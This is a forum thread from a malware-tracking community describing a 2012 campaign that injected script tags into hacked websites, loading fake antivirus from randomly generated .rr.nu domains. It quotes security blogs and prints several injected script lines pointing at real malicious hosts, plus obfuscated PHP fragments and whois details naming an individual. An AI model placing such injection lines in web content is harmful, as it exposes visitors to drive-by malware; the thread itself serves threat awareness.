Malware Campaign from .rr.nu

Prorootect

Level 69
Thread author
Verified
Nov 5, 2011
5,855
.
Malware Campaign from .rr.nu topic only here ..

Malware Campaign from .rr.nu : on blog.sucuri.net : http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html

'We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.'

I too ..

Dyslexic Mayans Want to Sell You Cialis
Problems with preg_replace("/.*/e","\x65\x76 , $_8b7b="\x63\x72\, eval(base64_ hacks, and those damn rr.nu domain redirects : on domesticenthusiast.blogspot.fr : http://domesticenthusiast.blogspot.fr/
.
 

Prorootect

Level 69
Thread author
Verified
Nov 5, 2011
5,855
So look at this example:

<!-- Share This END -->
<script src="http://garin90diana.rr.nu/pmg.php?d=x"></script>
</body>
</html>

:D

.. or after refresh of this hacked page:


<!-- Share This END -->
<script src="http://pfo42rest.rr.nu/pmg.php?d=x"></script>
</body>
</html>

:D:D

.. or:

<script src="http://cua09tedp.rr.nu/pmg.php?d=x"></script>

.. or:

<script src="http://nings61diagno.rr.nu/pmg.php?d=x"></script>

.. or:

<script src="http://red38fir.rr.nu/pmg.php?d=x"></script>

etc etc., then you have the payload: Antivirus 2012 or other FakeAV from Russia with Love:D
 

Prorootect

Level 69
Thread author
Verified
Nov 5, 2011
5,855
On-Going Dynamic FakeAV Campaign (yes, from Russia with Love!..) : on Zscaler blog: http://research.zscaler.com/2012/03/on-going-dynamic-fakeav-campaign.html

'The campaign is making use of auto-domain generation and auto-updating of infected sites to change the embedded link with every visit.' ..

'There were over 100 of our customers attempting to access a large number of websites on a handful of IPs with domains matching the pattern:
[3-6 random letters][2 digits][3-6 random letters].rr.nu
Given the very, very large number of domains used, this has to be some auto-domain generation/registration algorithm used in this campaign.

The pages accessed in the campaign includes:
/n.php?h=1&s=mm
/mm.php?d=x1
/nl.php?p=d

..

195.88.181.112 hosting information:

inetnum: 195.88.181.0 - 195.88.181.255
netname: INET4YOU
descr: PE Bogaturev Sergey Anatolievich
country: RU

person: Bogaturev Sergey
address: RU, Gornuy #####, Komsomolskiy str. '

Aaa, Mr.Sergey, Gournuy ##### .. RU, Gornuy #####, Komsomolskiy str - it's good to know! Visit immediately your post of Police, and tell all.:(
.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top